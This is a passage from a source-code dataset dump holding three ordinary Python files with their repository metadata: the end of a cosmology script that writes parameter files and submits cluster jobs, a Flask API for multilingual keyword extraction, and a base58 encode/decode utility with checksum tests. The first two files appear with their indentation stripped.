AA = [AA[i].replace("boxsize_y = 1000.0", "boxsize_y = %3.1f" % boxsize_y) for i in range(len(AA))]
AA = [AA[i].replace("boxsize_z = 1000.0", "boxsize_z = %3.1f" % boxsize_z) for i in range(len(AA))]
AA = [AA[i].replace("n_mesh_x = 512", "n_mesh_x = %3.0d" % n_mesh_x) for i in range(len(AA))]
AA = [AA[i].replace("n_mesh_y = 512", "n_mesh_y = %3.0d" % n_mesh_y) for i in range(len(AA))]
AA = [AA[i].replace("n_mesh_z = 512", "n_mesh_z = %3.0d" % n_mesh_z) for i in range(len(AA))]
AA = [AA[i].replace("kmin = 0.01", "kmin = %1.3f" % kmin) for i in range(len(AA))]
AA = [AA[i].replace("kmax = 0.2", "kmax = %1.3f" % kmax) for i in range(len(AA))]
AA = [AA[i].replace("n_kbin = 20", "n_kbin = %02d" % n_kbin) for i in range(len(AA))]
AA = [AA[i].replace("rmin = 30", "rmin = %2.1f" % rmin) for i in range(len(AA))]
AA = [AA[i].replace("rmax = 150.0", "rmax = %3.1f" % rmax) for i in range(len(AA))]
AA = [AA[i].replace("n_rbin = 25", "n_rbin = %02d" % n_rbin) for i in range(len(AA))]
AA = [AA[i].replace("flag_recon = False", "flag_recon = %s" % flag_recon) for i in range(len(AA))]
AA = [AA[i].replace("b1_fid = 1.0", "b1_fid = %1.3f" % b1_fid) for i in range(len(AA))]
AA = [AA[i].replace("RG = 15.0", "RG = %2.1f" % RG) for i in range(len(AA))]
AA = [AA[i].replace("n_mesh_recon_x = 512", "n_mesh_recon_x = %3.0d" % n_mesh_x) for i in range(len(AA))]
AA = [AA[i].replace("n_mesh_recon_y = 512", "n_mesh_recon_y = %3.0d" % n_mesh_y) for i in range(len(AA))]
AA = [AA[i].replace("n_mesh_recon_z = 512", "n_mesh_recon_z = %3.0d" % n_mesh_z) for i in range(len(AA))]
AA = [AA[i].replace("ith_kbin = 0", "ith_kbin = %d" % ith_kbin) for i in range(len(AA))]
AA = [AA[i].replace("ith_rbin = 0", "ith_rbin = %d" % ith_rbin) for i in range(len(AA))]
AA = [AA[i].replace("sim_data = Gadget", "sim_data = %s" % sim_data) for i in range(len(AA))]
AA = [AA[i].replace("flag_RSD = True", "flag_RSD = %s" % flag_RSD) for i in range(len(AA))]
AA = [AA[i].replace("log10_Mmin = 12.9", "log10_Mmin = %2.1f" % log10_Mmin) for i in range(len(AA))]
AA = [AA[i].replace("log10_Mmax = 13.5", "log10_Mmax = %2.1f" % log10_Mmax) for i in range(len(AA))]
if sim_data == "Gadget":
if flag_recon == "False":
fname = "%s%d%d%d_%s_zbin%d_RSD%s" % (measure, ell1, ell2, ELL, sim_data, zbin, flag_RSD)
elif flag_recon == "True":
fname = "%s%d%d%d_%s_zbin%d_RSD%s_recon_R%02d" % (measure, ell1, ell2, ELL, sim_data, zbin, flag_RSD, RG)
elif sim_data == "Rockstar":
if flag_recon == "False":
fname = "%s%d%d%d_%s_Mmin%2.1f_Mmax%2.1f_zbin%d_RSD%s" % (measure, ell1, ell2, ELL, sim_data, log10_Mmin, log10_Mmax, zbin, flag_RSD)
elif flag_recon == "True":
fname = "%s%d%d%d_%s_Mmin%2.1f_Mmax%2.1f_zbin%d_RSD%s_recon_R%02d" % (measure, ell1, ell2, ELL, sim_data, log10_Mmin, log10_Mmax, zbin, flag_RSD, RG)
else:
print("ERROR")
exit()
param_file = "PARAMS/param_%s.ini" % (fname)
fw = open(param_file, "w")
fw.writelines(AA)
fw.close()
fr = open("run_base.sh", "r")
AA = fr.readlines()
fr.close()
log_file = "LOG/%s.log" % (fname)
AA = [AA[i].replace("./a.out default_param.ini > log", "./a.out %s > %s" % (param_file, log_file)) for i in range(len(AA))]
fw = open("run_new.sh", "w")
fw.writelines(AA)
fw.close()
subprocess.call(["chmod", "u+x", "run_new.sh"])
subprocess.call(["qsub", "run_new.sh"])
| 48.957547 | 177 | 0.458233 |
e892c7a05a248319723c89a515ffff77ae1d506b | 3,134 | py | Python | services/web/project/__init__.py | bkolosk1/bert-multilingual-kws-docker | cfdaf03b8a980632342cb79c190d2c98bee9bccd | [
"MIT"
] | null | null | null | services/web/project/__init__.py | bkolosk1/bert-multilingual-kws-docker | cfdaf03b8a980632342cb79c190d2c98bee9bccd | [
"MIT"
] | null | null | null | services/web/project/__init__.py | bkolosk1/bert-multilingual-kws-docker | cfdaf03b8a980632342cb79c190d2c98bee9bccd | [
"MIT"
] | 1 | 2022-03-23T15:36:51.000Z | 2022-03-23T15:36:51.000Z | import os
import json
from flask import (
Flask,
jsonify,
send_from_directory,
request,
redirect,
url_for
)
from flask_restx import Api, Resource, fields, abort, reqparse
import werkzeug
werkzeug.cached_property = werkzeug.utils.cached_property
from werkzeug.utils import secure_filename
from werkzeug.middleware.proxy_fix import ProxyFix
from . import api_functions
from . import keyword_extraction_main as kw
#from .bert_crossling_prep import get_batch, Corpus, batchify, batchify_docs, get_batch_docs, file_to_df
import warnings
warnings.filterwarnings("ignore", category=DeprecationWarning)
from transformers import BertTokenizer
from lemmagen3 import Lemmatizer
lemmatizer = Lemmatizer('sl').lemmatize
app = Flask(__name__)
app.wsgi_app = ProxyFix(app.wsgi_app)
api = Api(app, version='1.0',
title='API services',
description='Multilingual keyword extraction REST API')
ns = api.namespace('rest_api', description='REST services API')
args = {
'max_length': 256,
'cuda': False,
'kw_cut': 10,
'stemmer': lemmatizer,
'split_docs': True,
'bpe': True,
'max_vocab_size' : 0,
'classification': True,
'adaptive': False,
'transfer_learning': True,
'POS_tags': False,
'bpe': True,
'masked_lm': False,
'rnn': False,
'crf': False,
'dev_id' : 0,
'n_ctx' : 256,
'lang' : 'en',
'dict_path' : "dict_russian_latvian_estonian_slovenian_croatian_english_bpe_nopos_nornn_nocrf.ptb",
}
kw_model_path = "model_russian_latvian_estonian_slovenian_croatian_english_folder_russian_latvian_estonian_slovenian_croatian_english_loss_0.06955235407170482_epoch_9.pt"
kw_dictionary_path = "dict_russian_latvian_estonian_slovenian_croatian_english_bpe_nopos_nornn_nocrf.ptb"
kw_sp = BertTokenizer.from_pretrained('bert-base-multilingual-uncased',return_dict=False)
kw_model = kw.loadModel(os.path.join("project", "trained_classification_models", kw_model_path), args['cuda'])
kw_dictionary = kw.loadDict(os.path.join("project", "dictionaries", kw_dictionary_path))
#kw_sp = BertTokenizer.from_pretrained('bert-base-multilingual-uncased')
#kw_sp.Load(os.path.join("project","bpe", "SloBPE.model"))
# input and output definitions
kw_extractor_input = api.model('KeywordExtractorInput', {
'text': fields.String(required=True, description='Title + lead + body of the article'),
})
kw_extractor_output = api.model('KeywordExtractorOutput', {
'keywords': fields.List(fields.String, description='Extracted keywords'),
})
@ns.route('/extract_keywords/')
class KeywordExtractor(Resource):
@ns.doc('Extracts keywords from news article')
@ns.expect(kw_extractor_input, validate=True)
@ns.marshal_with(kw_extractor_output)
def post(self):
kw_lem = api_functions.extract_keywords(api.payload['text'], kw_model, kw_dictionary, kw_sp, lemmatizer, args)
return {"keywords": kw_lem}
@ns.route('/health/')
class Health(Resource):
@ns.response(200, "successfully fetched health details")
def get(self):
return {"status": "running", "message": "Health check successful"}, 200, {}
| 31.979592 | 170 | 0.741863 |
5638db1cae5467e823fde3b9dda104a5986f6cf0 | 2,993 | py | Python | contrib/testgen/base58.py | helveticum/helveticum | 0781224d86d542281b1f2f98ae533d1252e1e71b | [
"MIT"
] | 1 | 2017-07-06T06:04:15.000Z | 2017-07-06T06:04:15.000Z | contrib/testgen/base58.py | helveticum/helveticum | 0781224d86d542281b1f2f98ae533d1252e1e71b | [
"MIT"
] | null | null | null | contrib/testgen/base58.py | helveticum/helveticum | 0781224d86d542281b1f2f98ae533d1252e1e71b | [
"MIT"
] | null | null | null | # Copyright (c) 2012-2016 The Helveticum Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
'''
Helveticum base58 encoding and decoding.
Based on https://helveticumtalk.org/index.php?topic=1026.0 (public domain)
'''
import hashlib
# for compatibility with following code...
class SHA256:
new = hashlib.sha256
if str != bytes:
# Python 3.x
def ord(c):
return c
def chr(n):
return bytes( (n,) )
__b58chars = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'
__b58base = len(__b58chars)
b58chars = __b58chars
def b58encode(v):
""" encode v, which is a string of bytes, to base58.
"""
long_value = 0
for (i, c) in enumerate(v[::-1]):
long_value += (256**i) * ord(c)
result = ''
while long_value >= __b58base:
div, mod = divmod(long_value, __b58base)
result = __b58chars[mod] + result
long_value = div
result = __b58chars[long_value] + result
# Helveticum does a little leading-zero-compression:
# leading 0-bytes in the input become leading-1s
nPad = 0
for c in v:
if c == '\0': nPad += 1
else: break
return (__b58chars[0]*nPad) + result
def b58decode(v, length = None):
""" decode v into a string of len bytes
"""
long_value = 0
for (i, c) in enumerate(v[::-1]):
long_value += __b58chars.find(c) * (__b58base**i)
result = bytes()
while long_value >= 256:
div, mod = divmod(long_value, 256)
result = chr(mod) + result
long_value = div
result = chr(long_value) + result
nPad = 0
for c in v:
if c == __b58chars[0]: nPad += 1
else: break
result = chr(0)*nPad + result
if length is not None and len(result) != length:
return None
return result
def checksum(v):
"""Return 32-bit checksum based on SHA256"""
return SHA256.new(SHA256.new(v).digest()).digest()[0:4]
def b58encode_chk(v):
"""b58encode a string, with 32-bit checksum"""
return b58encode(v + checksum(v))
def b58decode_chk(v):
"""decode a base58 string, check and remove checksum"""
result = b58decode(v)
if result is None:
return None
if result[-4:] == checksum(result[:-4]):
return result[:-4]
else:
return None
def get_bcaddress_version(strAddress):
""" Returns None if strAddress is invalid. Otherwise returns integer version of address. """
addr = b58decode_chk(strAddress)
if addr is None or len(addr)!=21: return None
version = addr[0]
return ord(version)
if __name__ == '__main__':
# Test case (from http://gitorious.org/helveticum/python-base58.git)
assert get_bcaddress_version('15VjRaDX9zpbA8LVnbrCAFzrVzN7ixHNsC') is 0
_ohai = 'o hai'.encode('ascii')
_tmp = b58encode(_ohai)
assert _tmp == 'DYB3oMS'
assert b58decode(_tmp, 5) == _ohai
print("Tests passed")
| 27.971963 | 97 | 0.640829 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.